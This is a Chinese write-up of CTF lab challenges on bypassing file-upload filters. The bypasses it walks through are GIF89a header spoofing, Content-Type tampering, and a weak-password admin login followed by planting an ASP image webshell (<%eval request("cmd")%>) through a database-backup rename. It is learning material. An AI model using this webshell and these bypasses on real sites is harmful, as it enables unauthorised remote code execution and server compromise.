第三题
又是熟悉的上传文件界面,上传一句话木马, 不行 但是png gif jpg行, 但是图片马偏偏不行????那就应该是对文件头的检测了(一开始以为是对MIME类型的限制,图片马不行那就说明不是对MIME类型的限制)
在一句话木马前加上GIF89a,上传
哦豁果然是对文件头的检测,一如既往用蚁剑连接找到key文件找到flag
第四题
今天好累,明天再写吧
来啦来啦
随便上传php看看,不行,那就上传一个图片马发现可行,既然上一题是对文件头的检测 那么这题就应该是对Content-Type的检测
上传php,抓包,将content-type改成可允许上传的类型(像jpg png gif )
一如既往,蚁剑连接找到key文件即可。
第五题(还不是很理解,后续再补)
一个发布站点???asp脚本???看看后台管理
后台路径很明显,那就浅浅地后台弱口令登陆(这里还是有一个很不懂的地方,验证码不能复用那么表单得重新提交进行登录,是不是因为这个原因才导致不能进行弱口令爆破)
可以看到有文章管理和数据处理,文章管理顾名思义就是文件上传啦
那就将asp代码<%eval request("cmd")%> 和图片合成一张图片马,代码如下:
copy 1.asp /b + 1.png /a webshell.png
将图片上传
复制路径到数据处理处到当前数据库路径,将数据库名称更改为 XXX.asp(和php差不多一样的,只不过是语言不一样哈哈哈),备份数据
得到如下
一如既往用蚁剑来连接,路径是.....(省略啦)/admin/Databackup/1.asp
用蚁剑链接的时候卡住了好久,路径一直不对,最后才发现是没加上admin呜呜呜
key文件在intpub目录下喔!!!